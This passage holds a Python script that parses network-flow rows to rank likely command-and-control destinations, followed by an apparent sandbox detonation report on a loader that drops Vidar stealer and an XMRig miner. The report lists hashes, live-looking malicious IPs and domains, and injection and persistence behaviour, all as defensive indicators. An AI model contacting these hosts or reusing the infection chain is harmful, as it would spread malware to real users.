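SAMPLE_TABLE = """
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 72.84.118.132:8080 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
"""


@dataclass(frozen=True)
class Flow:
    country: str
    dest: str      # "ip:port" as printed in the Destination column
    domain: str    # empty for direct-to-IP sessions
    proto: str     # "tcp" or "udp"

    @property
    def port(self) -> int:
        return int(self.dest.rsplit(":", 1)[1])


def parse_rows(table: str) -> list[Flow]:
    """Parse the report's pipe-delimited network rows into Flow records."""
    flows = []
    for line in table.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country" or cells[0].startswith("-"):
            continue
        country, dest, domain, proto = cells
        # Direct-to-IP rows sometimes arrive shifted left (proto in the Domain column,
        # Proto empty); put the values back where they belong.
        if domain in ("tcp", "udp") and proto == "":
            domain, proto = "", domain
        flows.append(Flow(country, dest, domain, proto))
    return flows


def summarize(flows: list[Flow]) -> dict:
    """Split the traffic into: names resolved but never contacted, TCP session counts per
    destination, and direct-to-IP destinations on ports other than 80/443 (most C2-like first)."""
    dns_names = {f.domain for f in flows if f.proto == "udp" and f.port == 53 and f.domain}
    contacted = {f.domain for f in flows if f.proto == "tcp" and f.domain}
    sessions = Counter(f.dest for f in flows if f.proto == "tcp")
    direct_nonweb = {f.dest for f in flows
                     if f.proto == "tcp" and not f.domain and f.port not in (80, 443)}
    return {
        "resolved_never_contacted": sorted(dns_names - contacted),
        "tcp_sessions": sessions,
        "direct_ip_nonweb_ports": sorted(direct_nonweb, key=lambda d: -sessions[d]),
    }


if __name__ == "__main__":
    result = summarize(parse_rows(SAMPLE_TABLE))
    print("resolved but never contacted:", result["resolved_never_contacted"])
    print("direct-to-IP, non-web ports :", result["direct_ip_nonweb_ports"])
    for dest, n in result["tcp_sessions"].most_common(5):
        print(f"{dest:>24}  {n} session(s)")
```

The `direct_ip_nonweb_ports` list is the one to push into blocking and retro-hunting first: those hosts are reached without DNS, on odd ports, and repeatedly, which matches the stealer and loader check-ins this sample is flagged for. The `resolved_never_contacted` names are still worth recording, because a variant built a day later may point at whichever of them is alive by then.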
Files
\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe
| MD5 | ba794724c566766d57e2aee175cde54a |
| SHA1 | 401fb41eaf42791c66738f460009ba00f7cdd913 |
| SHA256 | 9a6c446576e8005dae5b5fb4df7876dea6f09501156e9a5220b60d77b41566d6 |
| SHA512 | 590777c06b912054ef8722c8195521e1c74bf3f31f7c3b8e9e2b7a14352f25ed0ada8e6751916017bd506af03eb0afea0ca759872a8ff17d5837836fdaf6e774 |
memory/1864-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zSC6A42827\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/1864-75-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-81-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe
| MD5 | c90e5a77dd1e7e03d51988bdb057bd9f |
| SHA1 | 498bd4b07d9e11133943e63c2cf06e28d9e99fc5 |
| SHA256 | cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54 |
| SHA512 | bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34 |
\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe
| MD5 | 26278caf1df5ef5ea045185380a1d7c9 |
| SHA1 | df16e31d1dd45dc4440ec7052de2fc026071286c |
| SHA256 | d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5 |
| SHA512 | 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O4ME655FRBIHVU8GHA65.temp
| MD5 | b9e77e0f9f67e51b998d217d75b67fb6 |
| SHA1 | 89b32401fc5be2391a57a4770d7ddf8419de6633 |
| SHA256 | 2a060ef2c0daa42d63bf58ec43e23a02deae6310298f7614944249a0da87b60b |
| SHA512 | 7e4c834afbbb5853baf3bb17c82906341aeaab205baf38d3827554e907b3cf595591e3eb793a77e69cd59983e12a9ac3a87da27306e90100fd50600668bc6f08 |
memory/2212-139-0x00000000012D0000-0x0000000001342000-memory.dmp
memory/596-144-0x0000000000BB0000-0x0000000000BB8000-memory.dmp
memory/3012-171-0x00000000004F0000-0x00000000004F6000-memory.dmp
memory/1876-193-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2228-194-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2396-197-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\is-CBB09.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
C:\Users\Admin\AppData\Local\Temp\is-CBB09.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2392-142-0x0000000000A80000-0x0000000000AF0000-memory.dmp
memory/3012-140-0x0000000000B20000-0x0000000000B38000-memory.dmp
memory/2988-222-0x0000000002630000-0x0000000002820000-memory.dmp
memory/1156-223-0x0000000000400000-0x0000000002F02000-memory.dmp
memory/1272-241-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-249-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-246-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-245-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1272-242-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1272-248-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1272-240-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1272-238-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1272-236-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1272-234-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-231-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-228-0x0000000000400000-0x0000000000422000-memory.dmp
memory/304-226-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1864-250-0x0000000064940000-0x0000000064959000-memory.dmp
memory/304-224-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1376-138-0x0000000000080000-0x00000000000F0000-memory.dmp
memory/2396-136-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe
| MD5 | 21a61f35d0a76d0c710ba355f3054c34 |
| SHA1 | 910c52f268dbbb80937c44f8471e39a461ebe1fe |
| SHA256 | d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd |
| SHA512 | 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe
| MD5 | bf2f6094ceaa5016d7fb5e9e95059b6b |
| SHA1 | 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad |
| SHA256 | 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12 |
| SHA512 | 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe
| MD5 | 83552f70e7791687013e0b6e77eef7f4 |
| SHA1 | ae6e0e3f2873dd234b4813d4c6a47364111dec8a |
| SHA256 | 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84 |
| SHA512 | 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9 |
memory/2296-278-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-276-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-275-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-274-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2296-272-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-270-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2296-268-0x0000000000400000-0x0000000000422000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe
| MD5 | 0c4602580c43df3321e55647c7c7dfdb |
| SHA1 | 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1 |
| SHA256 | fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752 |
| SHA512 | 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe
| MD5 | 0b67130e7f04d08c78cb659f54b20432 |
| SHA1 | 669426ae83c4a8eacf207c7825168aca30a37ca2 |
| SHA256 | bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac |
| SHA512 | 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe
| MD5 | c1bc0cca3a8784bbc7d5d3e9e47e6ba4 |
| SHA1 | 500970243e0e1dd57e2aad4f372da395d639b4a3 |
| SHA256 | 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1 |
| SHA512 | 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5 |
C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
memory/1864-284-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-283-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/1864-282-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-281-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1864-279-0x0000000000400000-0x000000000051C000-memory.dmp
memory/1864-80-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1864-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-74-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-73-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-72-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1064-285-0x0000000000400000-0x0000000002F29000-memory.dmp
memory/1964-286-0x0000000000400000-0x00000000016FB000-memory.dmp
memory/1864-71-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1864-70-0x0000000064941000-0x000000006494F000-memory.dmp
memory/1864-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC6A42827\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/1864-61-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC6A42827\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zSC6A42827\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/1864-299-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1864-298-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1864-297-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1864-296-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1864-290-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabC60D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:28
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
156s
Command Line
Signatures
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2956 set thread context of 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\inst2.exe | C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg |
| PID 4320 set thread context of 4556 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Jonba.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Jonba.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cxl-game.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Jonba.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
C:\Users\Admin\AppData\Local\Temp\inst2.exe
"C:\Users\Admin\AppData\Local\Temp\inst2.exe"
C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
"C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp" /SL5="$40252,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
C:\Users\Admin\AppData\Local\Temp\8.exe
"C:\Users\Admin\AppData\Local\Temp\8.exe"
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
C:\Windows\SysWOW64\mshta.exe
